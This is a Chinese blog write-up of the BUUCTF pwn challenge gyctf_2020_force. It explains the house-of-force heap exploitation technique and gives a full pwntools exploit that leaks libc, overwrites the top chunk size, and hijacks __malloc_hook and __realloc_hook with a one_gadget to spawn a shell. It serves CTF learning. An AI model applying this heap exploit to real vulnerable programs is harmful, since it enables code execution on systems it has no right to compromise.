[BUUCTF]PWN——gyctf_2020_force(house of force)

最新推荐文章于 2023-08-24 23:40:25 发布
最新推荐文章于 2023-08-24 23:40:25 发布
阅读量777 收藏 4
点赞数 2
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/113355466
版权

gyctf_2020_force

附件

步骤

  1. 例行检查,64位,保护全开
    在这里插入图片描述
  2. 本地试运行一下看看大概的情况,看样子是堆题
    在这里插入图片描述
  3. 64位ida载入
    main()
    在这里插入图片描述
    add()
    在这里插入图片描述
    show(),感觉这个函数没啥用,就不贴了
能够以溢出等方式控制到 top chunk 的 size 域
能够自由地控制堆分配尺寸的大小

根据上述的条件还有根题目force提示,这题应该是使用house of force的方法,关于house of force的详细解释看ctf wiki

利用思路

  1. 程序在申请chunk后,会打印出chunk的地址,动调找偏移,我们就可以算出libc_base
  2. 把top chunk的size改为0xffffffffffffffff(-1的补码)
  3. 我们申请一个size为malloc_hook和top chunk之间的偏移的chunk,那么就能将top chunk推到malloc_hook附近,劫持malloc_hook为one_gadget,获取shell

利用过程

  1. 泄露libc
    首先申请一个很大的chunk,系统会用mmap分配,mmap分配的这块区域在libc下方,偏移是固定的,所以可以算出libc
libc.address = add(0x200000, 'chunk0\n')  #这chunk的大小一定要足够大,我试了好多,都太小了,最后看其他师傅用的0x200000

在这里插入图片描述
如图,确定偏移是0x200ff0,因此libc基址可以表示为libc_address = add(0x200000, 'chunk0\n') + 0x200ff0

  1. 将top chunk大小改为0xFFFFFFFFFFFFFFFF
    当使用 top chunk 分配堆块的 size 值是由用户控制的任意值时,可以使得 top chunk 指向我们期望的任何位置,这就相当于一次任意地址写。
    由于每次都能读入0x50,只要申请一个比这个小的chunk,就能溢出,我们通过这个溢出,可以把top chunk的size改为0xffffffffffffffff,这样我们就可以不限制地进行分配chunk,贴一下ctfwiki里的图,看检查就能清楚了
    在这里插入图片描述
    用改代码可以修改top chunk,顺便获取了heap的地址heap_addr = add(0x18, 'a'*0x10+p64(0)+p64(0xFFFFFFFFFFFFFFFF))
    知道了heap的地址,top_chunk的地址也能直接算出来了top = heap_addr + 0x10

  2. 劫持malloc_hook
    步骤1里面已经获取了lbc,因为程序开了Full RELRO,我们不能劫持GOT表,所以打算劫持malloc_hook,利用one_gadget
    计算偏移使得 top chunk 正好落在 __malloc_hook 方,再一次分配区块就可以覆写 __realloc_hook 和 __malloc_hook

malloc_hook = libc.sym['__malloc_hook']
realloc = libc.sym["__libc_realloc"]
offset = malloc_hook - top
system = libc.sym['system']
bin_sh = libc.search('/bin/sh').next()
one_gadget = one_gadget_16[1] + libc_base
  1. 这边直接利用one_gadget不成功,应该是步骤3里计算的offset条件不满足,我们可以通过realloc来调整
    在这里插入图片描述
    可见realloc开始的时候会调用许多的push,然后rsp-0x38,一般来讲one_gadget失效就是rsp没有和0x10对齐的原因,那其实我们给rsp减掉0x38基本上就可以实现对齐了。同时注意rsp减完之后realloc会调用__realloc_hook。
    所以我们的做法就是劫持__malloc_hook为realloc+0x10,并劫持__realloc_hook为one_gadget,就可以get shell了
    在这里插入图片描述
    两个钩子是在一起的,所以我们在算offset的时候应该是减0x30,其中0x10处理对齐的运算,0x20是的返回的指针指向&__malloc_hook - 0x10,然后我们就可以对两个钩子一起修改了。
    最后使用下面的语句就可以成功劫持malloc_hook,让realloc_hook覆盖为one_gadget
add(offset-0x30, 'aaa\n')
add(0x10, 'a'*8+p64(one_gadget)+p64(realloc+0x10))

完整exp

from pwn import *

r = remote("node3.buuoj.cn", 29522)
#r = process("./gyctf_2020_force")

context.log_level = 'debug'

elf = ELF("./gyctf_2020_force")
libc = ELF('./libc-2.23-64.so')

one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]

def add(size, content):
	r.recvuntil("2:puts\n")
	r.sendline('1')
	r.recvuntil("size\n")
	r.sendline(str(size))
	r.recvuntil("bin addr ")
	addr = int(r.recvuntil('\n').strip(), 16)
	r.recvuntil("content\n")
	r.send(content)
	return addr


def show(index):
	r.recvuntil("2:puts\n")
	r.sendline('2')

libc.address = add(0x200000, 'chunk0\n') + 0x200ff0
success('libc_base'+hex(libc.address))

heap_addr = add(0x18, 'a'*0x10+p64(0)+p64(0xFFFFFFFFFFFFFFFF))
success("heap_addr:"+hex(heap_addr))

top = heap_addr + 0x10
#gdb.attach(r)

malloc_hook = libc.sym['__malloc_hook']
success("malloc_hook"+hex(malloc_hook))
one_gadget = one_gadget_16[1] + libc.address
realloc = libc.sym["__libc_realloc"]
offset = malloc_hook - top
system = libc.sym['system']
bin_sh = libc.search('/bin/sh').next()
success("system:" + hex(system))
success("bin_sh" + hex(bin_sh))


add(offset-0x30, 'aaa\n')
add(0x10, 'a'*8+p64(one_gadget)+p64(realloc+0x10))

r.recvuntil("2:puts\n")
r.sendline('1')
r.recvuntil("size\n")
r.sendline(str(20))

r.interactive()

在这里插入图片描述

参考资料:https://www.cnblogs.com/pppyyyzzz/p/14248601.html
https://ctf-wiki.org/pwn/linux/glibc-heap/house_of_force/

Angel~Yan
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
BUUCTFgyctf_2020_force】(house of force)
weixin_51055545的博客
01-29 607
一道题学习 House of force 首先说明一下House of force的利用条件: 1.能够通过堆溢出等方法控制到topchunk的size 2.分配的大小没有限制,即可以申请任意大小的堆块 3.能够泄露出堆地址(topchunk) House of force 产生的原因: 在于 glibc 对 top chunk 的处理,进行堆分配时,如果所有空闲的块都无法满足需求,那么就会从 top chunk 中分割出相应的大小作为堆块的空间。若 top chunk 的 size 值是由用户控制的任意的
Pwn-gyctf_2020_force
fayinq的博客
03-13 365
gyctf_2020_force 这个题目是一个新的知识点,house_of_force,第一次看,以前没见过。 HOUSE_OF_FORCE: 使用条件: 能够使用溢出等手段,修改top_chunk的大小 能够自由分配chunk大小,不会被限制 基本原理: 在malloc之中,会有一个topchunk的size大小,如果说,能够malloc一个chunk的大小大于topchunk的大小(一般是0x20df1这种个大小),那么chunk就会去到vmmap映射出来的另一端地址,一般来说会在libc上面一点
gyctf_2020_force
qq_62887641的博客
08-24 66
首先我们申请一个足够大的chunk,通过mmap分配,并且该chunk是在libc下面的,可以算出libc基地址。因为涉及到topchunk并未对size进行细致检查(具体看源码),导致我们可以任意申请地址的chunk。size大小任意申请,然后还有个溢出,,只要我们申请的size小,就能通过read往下一个chunk写。做完这道题算是理解house of force 了,之前也没接触过,算是学到点新骚东西了。搜集学习了一下 house of force 其实也还挺容易理解的。
gyctf_2020_force【write up】
m0_73756460的博客
04-11 91
BUUCTF刷题gyctf_2020_force【write up】
BUUCTF-PWN gyctf_2020_forcehouse of force
weixin_44145820的博客
04-15 1307
目录程序分析漏洞分析漏洞利用EXP 程序分析 程序只有添加功能,puts功能没有用 添加功能中,有三个注意点 chunk大小没有限制 可以获得分配空间的地址 读入长度固定为0x50 漏洞分析 根据题目force,可以联想到house of force堆利用方法 以下内容取自ctf-wiki House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须...
house of forcegyctf_2020_force
huzai9527的博客
04-20 127
house of forcegyctf_2020_force 1.ida分析 申请任意大小的堆块,存在堆溢出 2.思路 申请一个较大的堆块,泄露libc的地址 修改top chunk的地址为0xffffffffffffffff 计算top chunk到malloc_hook-0x33的距离(malloc_hook-0x23 是一个合法的chunk)其实这个0x30-0x37应该都可以,malloc在分配的时候会自己进行对齐 通过申请到malloc上方的chunk修改mall
ctf php fork,CTF PWN 总结
weixin_42347873的博客
03-12 253
这个很久总结的了,基本很久没打比赛了,现在发出来了—— 20190903本文分为信息泄露和漏洞利用技术,因为很多时候信息泄露都是通用,下面的这两部分会重合信息泄露程序本来就给你泄露就再好不过了利用wrtite,puts,printf等泄露利用%s这个遇到00才停止的可能可以泄露(strlen,strdup等都需要关注)格式化字符串%x或这%p泄露uaf的任意读取smallbin(unsortbin...
i春秋2020新春战役PWN之force
seaaseesa的博客
02-26 778
House of force能够使我们将堆申请到任意地址,满足以下条件,即可达到利用 能够改写top chunk的size域 能够自由控制堆分配大小 能够知道目标地址与top chunk地址之间的距离(可以泄露地址,计算出偏移) 详细见CTF-WIKIhttps://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/house_of_force...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
Pulse Width modulation using Verilog HDL
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
node-v14.17.3-darwin-x64.tar.xz
04-22
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
c语言UDP传输系统源码.rar
04-22
c语言UDP传输系统源码.rar
node-v16.2.0-darwin-x64.tar.xz
最新发布
04-22
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于matlab多目标遗传算法matlab程序.rar
04-22
基于matlab多目标遗传算法matlab程序.rar
MCSkinn (我的世界)皮肤制作工具
04-22
软件可以给需要制作自己喜爱的MC皮肤的玩家来自己制作皮肤,快来下载吧!
数据可视化-Pyecharts绘制饼图
04-22
数据可视化-Pyecharts绘制饼图
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值